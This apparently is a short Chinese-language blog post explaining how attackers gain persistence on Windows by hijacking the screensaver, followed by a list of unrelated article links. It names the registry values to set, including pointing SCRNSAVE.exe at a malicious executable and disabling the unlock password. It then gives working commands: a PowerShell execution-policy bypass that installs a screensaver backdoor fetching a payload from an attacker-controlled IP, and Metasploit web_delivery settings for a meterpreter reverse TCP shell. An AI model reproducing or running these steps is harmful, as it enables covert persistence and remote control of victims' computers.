windows屏幕保护程序
2023-06-13 09:14:58 时间
攻击者可以通过执行由用户不活动触发的恶意内容来建立持久性。
屏幕保护程序是在用户不活动时间的可配置时间后执行的程序,
由文件扩展名为 .scr 的可移植可执行 (PE) 文件组成。
Windows屏幕保护程序应用程序scrnsave.scr位于64位Windows系统中,以及基本Windows安装中包含的屏幕保护程序。
C:\Windows\System32\
C:\Windows\sysWOW64\
以下屏幕保护程序设置存储在注册表 () 中,可以对其进行操作以实现持久性:
HKCU\Control Panel\Desktop\
SCRNSAVE.exe- 设置为恶意 PE 路径
ScreenSaveActive- 设置为“1”以启用屏幕保护程序
ScreenSaverIsSecure- 设置为“0”不需要密码即可解锁
ScreenSaveTimeout- 在执行屏幕保护程序之前设置用户不活动超时
攻击者可以使用屏幕保护程序设置来保持持久性,
方法是将屏幕保护程序设置为在用户处于非活动状态的特定时间范围后运行恶意软件。
set-executionpolicy Bypass
Import-Module .\Add-ScrnSaveBackdoor.ps1
Add-ScrnSaveBackdoor -PayloadURL http://192.168.85.161:8080/U4yNTne
use exploit/multi/script/web_delivery
set payload windows/x64/meterpreter/reverse_tcp
set target 2
set LHOST 192.168.85.161
set LPORT 7856
exploit -j
相关文章
- windows显示Linux对话框程序,在cmd命令行中弹出Windows对话框(使用mshta.exe命令)…
- Linux查看进程占用端口号_windows查看进程占用端口
- windows 重启redis的方法
- 在Windows上安装PHP(将PHP加载到Apache中)
- 【错误记录】Windows 控制台程序编译报错 ( WINDOWS.H already included. MFC apps must not #include <Windows.h> )
- MacOS|Windows 2023最新 PhpStorm 2023.1 安装教程
- 如何在Windows上查看MySQL的版本?(windows查看mysql版本)
- 从Windows传输文件至Linux(windows传文件到linux)
- 在Linux上运行Windows程序的方法(linux运行windows程序)
- 与windows结合Linux与Windows:使用一个桥梁(怎么连接linux)
- Windows中安装macOS:让你在同一台电脑上实现双系统切换(windows安装macos)
- 微软:Windows Server 2022进入预览阶段
- [下载] 微软向测试用户推出Windows 10 vNEXT Build 19619版ISO镜像
- 的windows系统在Linux服务器上挂载Windows系统的操作步骤(linux挂载服务器上)
- Zabbix监控(八):自动监控windows端口
- Windows实现连接Linux的新方式(windows连接linux)
- 令人惊讶:用Windows编译Linux程序(windows编译linux程序)
- 比较:Windows 与 Linux 的异同(windows和linux)
- 比较调研:Linux与Windows文件传输的优劣(linux和windows文件传输)
- 在Windows中安装Apache2和PHP4的权威指南
- Windows上安装Apache2、PHP5、MySQL5及与Resin配合实现多系统之整合